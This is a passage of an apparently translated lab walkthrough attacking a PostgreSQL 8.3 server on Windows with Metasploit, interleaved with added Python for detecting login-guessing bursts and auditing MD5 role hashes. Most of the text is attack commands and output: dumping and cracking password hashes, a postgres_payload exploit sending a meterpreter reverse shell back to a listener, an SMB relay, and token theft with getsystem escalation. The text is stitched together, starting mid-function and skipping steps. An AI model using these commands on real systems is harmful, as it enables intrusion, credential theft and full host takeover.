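    """Yield (timestamp, host, outcome, user) for authentication log lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group('ts'), '%Y-%m-%d %H:%M:%S')
        msg = m.group('msg')
        if msg.startswith(FAIL_MARK):
            yield ts, m.group('host'), 'fail', msg[len(FAIL_MARK):].rstrip('"')
        elif msg.startswith(OK_MARK):
            yield ts, m.group('host'), 'ok', msg[len(OK_MARK):].split()[0]


def find_guessing_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {host: finding} for each client whose failed logins inside one
    sliding `window` reach `threshold`; `success_after` names the user whose
    login from that client succeeded at or after the burst, if any."""
    per_host = defaultdict(list)
    for ev in sorted(parse_auth_events(log_text)):
        per_host[ev[1]].append(ev)
    findings = {}
    for host, evs in per_host.items():
        fails = [e for e in evs if e[2] == 'fail']
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                success = next((e[3] for e in evs
                                if e[2] == 'ok' and e[0] >= fails[end][0]), None)
                findings[host] = {'failures': end - start + 1,
                                  'users': sorted({e[3] for e in fails[start:end + 1]}),
                                  'success_after': success}
    return findings
```

A single client failing for postgres, admin and scott in six seconds and then authenticating as postgres is exactly the pattern the wordlist run above leaves behind.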


Query the version
  msf  auxiliary(postgres_login) > use auxiliary/scanner/postgres/postgres_version
  msf  auxiliary(postgres_version) > show options

  Module options (auxiliary/scanner/postgres/postgres_version):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     DATABASE  template1        yes       The database to authenticate against
     PASSWORD                   no        The password for the specified username. Leave blank for a random password.
     RHOSTS                     yes       The target address range or CIDR identifier
     RPORT     5432             yes       The target port
     THREADS   1                yes       The number of concurrent threads
     USERNAME  postgres         yes       The username to authenticate as
     VERBOSE   false            no        Enable verbose output

  msf  auxiliary(postgres_version) >
Fill in the IP, account, password and port, you know the drill
  msf  auxiliary(postgres_version) > set PASSWORD 123456
  PASSWORD => 123456
  msf  auxiliary(postgres_version) > set RHOSTS 5.5.5.3
  RHOSTS => 5.5.5.3
  msf  auxiliary(postgres_version) > exploit

  [*] 5.5.5.3:5432 Postgres - Version PostgreSQL 8.3.18, compiled by Visual C++ build 1400 (Post-Auth)
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf  auxiliary(postgres_version) >
Version PostgreSQL 8.3.18 ^_^

Dump every user's password hash
  msf  auxiliary(postgres_version) > use auxiliary/scanner/postgres/postgres_hashdump
  msf  auxiliary(postgres_hashdump) > show options

  Module options (auxiliary/scanner/postgres/postgres_hashdump):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     DATABASE  postgres         yes       The database to authenticate against
     PASSWORD                   no        The password for the specified username. Leave blank for a random password.
     RHOSTS                     yes       The target address range or CIDR identifier
     RPORT     5432             yes       The target port
     THREADS   1                yes       The number of concurrent threads
     USERNAME  postgres         yes       The username to authenticate as

  msf  auxiliary(postgres_hashdump) > set RHOSTS 5.5.5.3
  RHOSTS => 5.5.5.3
  msf  auxiliary(postgres_hashdump) > set PASSWORD 123456
  PASSWORD => 123456
  msf  auxiliary(postgres_hashdump) > exploit

  [*] Query appears to have run successfully
  [+] Postgres Server Hashes
  ======================

  Username  Hash
  --------  ----
  dis9team  7ca3de2618396dfaa75515c29885396e
  postgres  a3556571e93b0d20722ba62be61e8c2d
  test      5a2e54ee57e5b7273b9a8fed78c1ebd8

  [*] Hash Table has been saved: /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf  auxiliary(postgres_hashdump) >
Saved to /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
Take a look:
  brk@Dis9Team:/tmp$ cat /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
  Username,Hash
  "dis9team","7ca3de2618396dfaa75515c29885396e"
  "postgres","a3556571e93b0d20722ba62be61e8c2d"
  "test","5a2e54ee57e5b7273b9a8fed78c1ebd8"
  brk@Dis9Team:/tmp$
It has also been recorded in the MSF database:
  msf  auxiliary(postgres_hashdump) > loot

  Loot
  ====

  host     service   type             name                             content     info             path
  ----     -------   ----             ----                             -------     ----             ----
  5.5.5.3  postgres  postgres.hashes  5.5.5.3-5432_postgreshashes.txt  text/plain  Postgres Hashes  /home/brk/.msf4/loot/20120312070517_default_5.5.5.3_postgres.hashes_391828.txt

  msf  auxiliary(postgres_hashdump) >
Crack all the user passwords
  msf  auxiliary(postgres_hashdump) > use auxiliary/analyze/postgres_md5_crack
  msf  auxiliary(postgres_md5_crack) > show options

  Module options (auxiliary/analyze/postgres_md5_crack):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     Munge     false            no        Munge the Wordlist (Slower)
     Wordlist  /tmp/1.txt       no        The path to an optional Wordlist

  msf  auxiliary(postgres_md5_crack) > set Wordlist /tmp/1.txt
  Wordlist => /tmp/1.txt
  msf  auxiliary(postgres_md5_crack) > exploit

  [*] Processing wordlist...
  [*] Wordlist length: 88399
  [*] Attempting to crack hash: dis9team:7ca3de2618396dfaa75515c29885396e
  [+] Username: dis9team Pass: 123456
  [*] Attempting to crack hash: postgres:a3556571e93b0d20722ba62be61e8c2d
  [+] Username: postgres Pass: 123456
  [*] Attempting to crack hash: test:5a2e54ee57e5b7273b9a8fed78c1ebd8
  [+] Username: test Pass: 123456
  [*] Auxiliary module execution completed
  msf  auxiliary(postgres_md5_crack) >
Right, all cracked. The records in the database:
  msf  auxiliary(postgres_md5_crack) > creds

  Credentials
  ===========

  host     port  user      pass    type      active?
  ----     ----  ----      ----    ----      -------
  5.5.5.3  5432  dis9team  123456  password  true
  5.5.5.3  5432  postgres  123456  password  true
  5.5.5.3  5432  test      123456  password  true

  [*] Found 3 credentials.
  msf  auxiliary(postgres_md5_crack) >
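What the hashdump and crack steps above rely on, as an added example (not the post's code and not Metasploit's): PostgreSQL stored its MD5 role passwords as 'md5' + md5(password || username), so the username is the salt and a wordlist plus the username is all an offline check needs. The code reads the same "Username,Hash" loot layout shown above; the rows here are constructed from known passwords so the outcome can be verified offline, and the shared-password report covers the case the run above exposed (three roles, one password).

```python
import csv
import hashlib
import io


def pg_md5(password, username):
    """PostgreSQL's MD5 role-password form: 'md5' + md5(password || username).
    The username is the salt, so the same password hashes differently per role."""
    return 'md5' + hashlib.md5((password + username).encode()).hexdigest()


def parse_loot(csv_text):
    """Read the 'Username,Hash' CSV that postgres_hashdump writes to loot.
    A raw pg_authid dump still carries the 'md5' prefix; normalise it away."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        digest = row['Hash'].strip().lower()
        if digest.startswith('md5'):
            digest = digest[3:]
        rows.append((row['Username'].strip(), digest))
    return rows


def crack_loot(csv_text, wordlist):
    """Map each username to the first wordlist entry that reproduces its hash,
    or None. Every (user, word) pair is hashed separately because of the salt."""
    result = {}
    for user, digest in parse_loot(csv_text):
        result[user] = next((w for w in wordlist if pg_md5(w, user)[3:] == digest), None)
    return result


def shared_passwords(cracked):
    """Return {password: [users]} for passwords reused by more than one role."""
    by_pass = {}
    for user, pw in cracked.items():
        if pw is not None:
            by_pass.setdefault(pw, []).append(user)
    return {pw: sorted(users) for pw, users in by_pass.items() if len(users) > 1}


# Constructed loot file: same layout as the one cat'ed above, but the hashes
# are generated here from known passwords so the result can be checked.
SAMPLE_LOOT = 'Username,Hash\n' + '\n'.join(
    f'"{u}","{pg_md5(p, u)[3:]}"'
    for u, p in [('dis9team', '123456'), ('postgres', 'kq8#Vz!long'), ('test', '123456')])
WORDLIST = ['password', 'admin', '123456', 'postgres']
```

Any role that crack_loot resolves from a short wordlist, and any password shared_passwords reports, is a finding to fix; on PostgreSQL 10 and later the same audit is moot once password_encryption is set to scram-sha-256.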
Get system privileges (this is one way of doing it)
  msf > use exploit/windows/postgres/postgres_payload
  msf  exploit(postgres_payload) > show options

  Module options (exploit/windows/postgres/postgres_payload):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     DATABASE  template1        yes       The database to authenticate against
     PASSWORD                   no        The password for the specified username. Leave blank for a random password.
     RHOST                      yes       The target address
     RPORT     5432             yes       The target port
     USERNAME  postgres         yes       The username to authenticate as
     VERBOSE   false            no        Enable verbose output


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST     5.5.5.1          yes       The listen address
     LPORT     4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Automatic


  msf  exploit(postgres_payload) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
  msf  exploit(postgres_payload) > set PASSWORD 123456
  PASSWORD => 123456
  msf  exploit(postgres_payload) > exploit

  [*] Started reverse handler on 5.5.5.1:4444
  [*] Authentication successful and vulnerable version 8.3 on Windows confirmed.
  [*] Uploaded Ekhazpht.dll as OID 51954 to table gclggupi(trnuqjax)
  [*] Command Stager progress -   1.48% done (1499/101465 bytes)
  [*] Command Stager progress -   2.95% done (2998/101465 bytes)
  [*] Command Stager progress -   4.43% done (4497/101465 bytes)
  [*] Command Stager progress -   5.91% done (5996/101465 bytes)
  [*] Command Stager progress -   7.39% done (7495/101465 bytes)
  [*] Command Stager progress -   8.86% done (8994/101465 bytes)
  [*] Command Stager progress -  10.34% done (10493/101465 bytes)
  [*] Command Stager progress -  11.82% done (11992/101465 bytes)
  [*] Command Stager progress -  13.30% done (13491/101465 bytes)
  [*] Command Stager progress -  14.77% done (14990/101465 bytes)
  [*] Command Stager progress -  16.25% done (16489/101465 bytes)
  [*] Command Stager progress -  17.73% done (17988/101465 bytes)
  [*] Command Stager progress -  19.21% done (19487/101465 bytes)
  [*] Command Stager progress -  20.68% done (20986/101465 bytes)
  [*] Command Stager progress -  22.16% done (22485/101465 bytes)
  [*] Command Stager progress -  23.64% done (23984/101465 bytes)
  [*] Command Stager progress -  25.12% done (25483/101465 bytes)
  [*] Command Stager progress -  26.59% done (26982/101465 bytes)
  [*] Command Stager progress -  28.07% done (28481/101465 bytes)
  [*] Command Stager progress -  29.55% done (29980/101465 bytes)
  [*] Command Stager progress -  31.02% done (31479/101465 bytes)
  [*] Command Stager progress -  32.50% done (32978/101465 bytes)
  [*] Command Stager progress -  33.98% done (34477/101465 bytes)
  [*] Command Stager progress -  35.46% done (35976/101465 bytes)
  [*] Command Stager progress -  36.93% done (37475/101465 bytes)
  [*] Command Stager progress -  38.41% done (38974/101465 bytes)
  [*] Command Stager progress -  39.89% done (40473/101465 bytes)
  [*] Command Stager progress -  41.37% done (41972/101465 bytes)
  [*] Command Stager progress -  42.84% done (43471/101465 bytes)
  [*] Command Stager progress -  44.32% done (44970/101465 bytes)
  [*] Command Stager progress -  45.80% done (46469/101465 bytes)
  [*] Command Stager progress -  47.28% done (47968/101465 bytes)
  [*] Command Stager progress -  48.75% done (49467/101465 bytes)
  [*] Command Stager progress -  50.23% done (50966/101465 bytes)
  [*] Command Stager progress -  51.71% done (52465/101465 bytes)
  [*] Command Stager progress -  53.18% done (53964/101465 bytes)
  [*] Command Stager progress -  54.66% done (55463/101465 bytes)
  [*] Command Stager progress -  56.14% done (56962/101465 bytes)
  [*] Command Stager progress -  57.62% done (58461/101465 bytes)
  [*] Command Stager progress -  59.09% done (59960/101465 bytes)
  [*] Command Stager progress -  60.57% done (61459/101465 bytes)
  [*] Command Stager progress -  62.05% done (62958/101465 bytes)
  [*] Command Stager progress -  63.53% done (64457/101465 bytes)
  [*] Command Stager progress -  65.00% done (65956/101465 bytes)
  [*] Command Stager progress -  66.48% done (67455/101465 bytes)
  [*] Command Stager progress -  67.96% done (68954/101465 bytes)
  [*] Command Stager progress -  69.44% done (70453/101465 bytes)
  [*] Command Stager progress -  70.91% done (71952/101465 bytes)
  [*] Command Stager progress -  72.39% done (73451/101465 bytes)
  [*] Command Stager progress -  73.87% done (74950/101465 bytes)
  [*] Command Stager progress -  75.35% done (76449/101465 bytes)
  [*] Command Stager progress -  76.82% done (77948/101465 bytes)
  [*] Command Stager progress -  78.30% done (79447/101465 bytes)
  [*] Command Stager progress -  79.78% done (80946/101465 bytes)
  [*] Command Stager progress -  81.25% done (82445/101465 bytes)
  [*] Command Stager progress -  82.73% done (83944/101465 bytes)
  [*] Command Stager progress -  84.21% done (85443/101465 bytes)
  [*] Command Stager progress -  85.69% done (86942/101465 bytes)
  [*] Command Stager progress -  87.16% done (88441/101465 bytes)
  [*] Command Stager progress -  88.64% done (89940/101465 bytes)
  [*] Command Stager progress -  90.12% done (91439/101465 bytes)
  [*] Command Stager progress -  91.60% done (92938/101465 bytes)
  [*] Command Stager progress -  93.07% done (94437/101465 bytes)
  [*] Command Stager progress -  94.55% done (95936/101465 bytes)
  [*] Command Stager progress -  96.03% done (97435/101465 bytes)
  [*] Command Stager progress -  97.51% done (98934/101465 bytes)
  [*] Command Stager progress -  98.95% done (100400/101465 bytes)
  [*] Command Stager progress - 100.00% done (101465/101465 bytes)
PostgreSQL SMB ATTACK

First, connect to the database
  brk@Dis9Team:/tmp$ psql -h 5.5.5.3 -U postgres
  用户 postgres 的口令:
  psql (8.4.11, 服务器 8.3.18)
  警告:psql 版本8.4, 服务器版本8.3.
  一些psql功能可能无法工作.
  输入 "help" 来获取帮助信息.

  postgres=#
Start the smb relay
  msf  exploit(smb_relay) > exploit
  [*] Exploit running as background job.

  [*] Started reverse handler on 5.5.5.1:4444
  [*] Server started.
  msf  exploit(smb_relay) >
Create a table:
  postgres=# CREATE TABLE sb(sb text);
  ERROR:  relation "sb" already exists
  postgres=#
Right, I had already created it.

Read the share and get a shell.

Low-privilege shell

If I have a low-privilege shell, Metasploit can escalate the privileges automatically. Connect to the shell:
  msf  auxiliary(browser_autopwn) > sessions

  Active sessions
  ===============

    Id  Type                   Information                      Connection
    --  ----                   -----------                      ----------
    1   meterpreter x86/win32  DIS9TEAM-A1\admin @ DIS9TEAM-A1  5.5.5.1:3333 -> 5.5.5.3:1155 (5.5.5.3)

  msf  auxiliary(browser_autopwn) > sessions -i 1
  [*] Starting interaction with 1...

  meterpreter >
Check the privileges
  meterpreter > getuid
  Server username: DIS9TEAM-A1\admin
  meterpreter >
Hmm, not SYSTEM. Privilege escalation... uh, blue screen.
Never mind, let's start over =.=
  meterpreter > ps

  Process list
  ============

  PID   Name              Arch  Session  User               Path
  ---   ----              ----  -------  ----               ----
  0     [System Process]
  4     System
  112   pgagent.exe
  200   pg_ctl.exe
  264   postgres.exe
  364   SMSS.EXE
  520   httpd.exe
  588   csrss.exe
  612   winlogon.exe
  656   services.exe
  676   lsass.exe
  828   VBoxService.exe
  872   svchost.exe
  944   svchost.exe
  1040  svchost.exe
  1092  svchost.exe
  1144  postgres.exe
  1148  svchost.exe
  1224  postgres.exe
  1276  postgres.exe
  1280  postgres.exe
  1288  postgres.exe
  1300  postgres.exe
  1428  spoolsv.exe
  1692  Explorer.EXE      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\Explorer.EXE
  1796  VBoxTray.exe      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\VBoxTray.exe
  1816  ctfmon.exe        x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\ctfmon.exe
  1924  httpd.exe
  1968  mysqld.exe
  2652  alg.exe
  2836  wscntfy.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\wscntfy.exe
  2988  wuauclt.exe
  3760  iexplore.exe      x86   0        DIS9TEAM-A1\admin  C:\Program Files\Internet Explorer\iexplore.exe
  3952  notepad.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\System32\notepad.exe
  meterpreter > steal_token 3760
  Stolen token with username: DIS9TEAM-A1\admin
  meterpreter > getsystem -h
  Usage: getsystem [options]

  Attempt to elevate your privilege to that of local system.

  OPTIONS:

      -h        Help Banner.
      -t   The technique to use. (Default to '0').
                  0 : All techniques available
                  1 : Service - Named Pipe Impersonation (In Memory/Admin)
                  2 : Service - Named Pipe Impersonation (Dropper/Admin)
                  3 : Service - Token Duplication (In Memory/Admin)
                  4 : Exploit - KiTrap0D (In Memory/User)


  meterpreter > getsystem -t 1
  ...got system (via technique 1).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter >
Right, it worked.